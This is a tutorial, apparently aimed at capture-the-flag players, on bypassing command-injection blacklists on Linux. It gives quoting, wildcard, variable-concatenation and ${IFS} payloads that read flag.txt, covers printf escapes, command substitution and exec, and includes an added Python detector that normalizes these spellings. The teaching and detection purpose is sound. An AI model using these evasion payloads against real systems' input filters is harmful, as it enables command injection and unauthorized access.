Linux Command Execution Bypass
1 Command execution bypass
1.1 Keyword Bypass
Keyword bypass applies when a blacklist of keywords has been set up to block certain commands or arguments on a host.
For instance, if the cat command is filtered:
Substitute a command with similar functionality, such as tac, more, less, curl, nl, tail, sort, strings, head, paste or od.
Or break the keyword up with quoting, an empty command substitution or a backslash; the shell removes these before looking up the command name, so all four lines below run cat:
c'at' flag.txt
c"at" flag.txt
c``at flag.txt
c\at flag.txt
Another example: when the keyword flag is filtered in file names:
Use inline execution to print the contents of every file in the current directory:
cat `ls`
Or bypass the filter with wildcards:
# Print the contents of every file in the current directory
cat *
# ? matches exactly one character
cat fl?g.txt
# cat flag.txt
/bin/c?t flag.txt
# Open flag.txt using base64
/???/????64 ????.???      # /bin/base64 flag.txt
# Open flag.txt using bzip2 (bzip2 is five characters, so the last component needs four ? before the 2)
/???/???/????2 ????.???   # /usr/bin/bzip2 flag.txt
Wildcards are matched against paths on the filesystem (relative patterns against the current directory), not against the directories listed in PATH. Therefore, when you spell a system command with wildcards, you must give its absolute path.
Concatenation bypass
Define two variables in the shell and expand them next to each other. Use ; to enter multiple commands on one line.
# cat flag.txt
a=fl;b=ag.txt;cat $a$b
1.2 Whitespace bypass
Whitespace bypass is applicable when the host has filtered whitespace.
IFS bypass
The bash shell on Linux has a variable called IFS (internal field separator) that is used as the field separator when splitting text. By default IFS consists of the whitespace characters space, tab and newline.
# Default IFS in zsh, tested on Arch Linux
$ set | grep IFS
IFS=$' \t\n\C-@'
# Default IFS in bash, tested on Kali Linux
$ set | grep IFS
IFS=$' \t\n'
IFS is assigned like any ordinary variable, for example IFS=":". As long as IFS still contains a space, tab or newline (the default), expanding it inserts a separator, so it can stand in for a filtered space. Redirection needs no space at all, because < and <> are themselves word boundaries:
cat${IFS}flag.txt
cat$IFS$9flag.txt    # $9 is an empty positional parameter; it only ends the name IFS so it is not read as $IFSflag
cat<flag.txt
cat<>flag.txt
%20 / %09 bypass (URL-encoded space and tab)
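The filters in sections 1.1 and 1.2 fail because they match the raw string. The Python below is added here as an illustration (it is not code from the original page) and contrasts a naive substring blacklist with a check that first undoes the quoting, IFS, URL-encoding and variable-concatenation spellings above and then expands wildcards against a constructed file list; the file list, blacklist and helper names are assumptions.

```python
import fnmatch
import re

# Constructed filesystem listing (not a real host) used to expand wildcards
FS = ["/bin/cat", "/bin/base64", "/usr/bin/bzip2", "/bin/ls", "flag.txt"]
BLACKLIST = ("cat", "flag")

def is_blocked(cmd, words=BLACKLIST):
    """A substring blacklist of the kind the techniques above defeat."""
    return any(w in cmd for w in words)

def normalize(cmd):
    """Undo the shell-level spellings listed above before matching.
    Heuristic only: it models the quote, IFS, URL-encoding and
    variable-concatenation tricks, not a full shell grammar."""
    s = re.sub(r"""['"]|``|\\(?=\S)""", "", cmd)      # c'at', c"at", c``at, c\at
    s = re.sub(r"\$\{IFS\}|\$IFS(\$\d)?", " ", s)     # cat${IFS}x, cat$IFS$9x
    s = re.sub(r"%20|%09", " ", s)                    # URL-encoded space / tab
    assigns = dict(re.findall(r"(\w+)=([^;\s]+)", s))  # a=fl;b=ag.txt
    s = re.sub(r"\$(\w+)", lambda m: assigns.get(m.group(1), m.group(0)), s)
    s = re.sub(r"\b\w+=[^;\s]+;?", "", s)             # drop the assignments
    return s.strip()

def resolve_globs(cmd, fs=FS):
    """Expand ? and * the way the shell would: absolute patterns against
    absolute paths, relative patterns against the current directory."""
    out = []
    for tok in cmd.split():
        if not any(ch in tok for ch in "*?"):
            out.append(tok)
            continue
        pool = [p for p in fs if p.startswith("/") == tok.startswith("/")]
        hits = sorted(p for p in pool if fnmatch.fnmatchcase(p, tok))
        out.append(" ".join(hits) if hits else tok)
    return " ".join(out)

def detect(cmd, words=BLACKLIST):
    """Blacklist check applied after normalization and glob expansion."""
    return is_blocked(resolve_globs(normalize(cmd)), words)
```

Every sample from sections 1.1 and 1.2 passes is_blocked unchanged and is caught by detect; the lesson is that argument filtering has to happen after the shell's own expansion, or the shell has to be kept out of the picture entirely.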
2 Other useful tools for command execution
2.1 printf()
printf can turn octal, hexadecimal or Unicode escape sequences into the corresponding characters.
printf format-string [arguments...]
\NNN : the character whose ASCII code is the octal number NNN.
\xHH : the character whose code is the hexadecimal number HH.
\uHHHH : the Unicode character whose code point is the hexadecimal number HHHH.
2.2 $() and ` (backquotes)
In bash, $( ) and backquotes execute the command inside the brackets or quotes; this is called command substitution. Command substitution is similar to variable substitution: the command inside the quotes runs first, and its output is then spliced into the surrounding command line, which is executed in turn.
$ echo today is $(date "+%Y-%m-%d")
today is 2023-06-30
2.3 exec
In the shell, exec replaces the current shell process with the given command, which then runs directly in that process.
For example, in WSL, running exec ls replaces the shell process of the WSL session with ls: ls prints its output and exits, and with it the whole WSL session ends.
$ exec ls
code project
PS C:\windows\system32> # WSL session process is replaced, returning to the Windows terminal
In the same way, exec can be used on Linux to switch shells. A similar operation can be used for escalation of privileges in penetration testing. See future articles for more on privilege escalation.
# Replace process /bin/zsh with /bin/bash
➜ ~ echo $SHELL
/bin/zsh
➜ ~ exec /bin/bash
[root@bowendelg ~]
[root@bowendelg ~]echo $SHELL
/bin/bash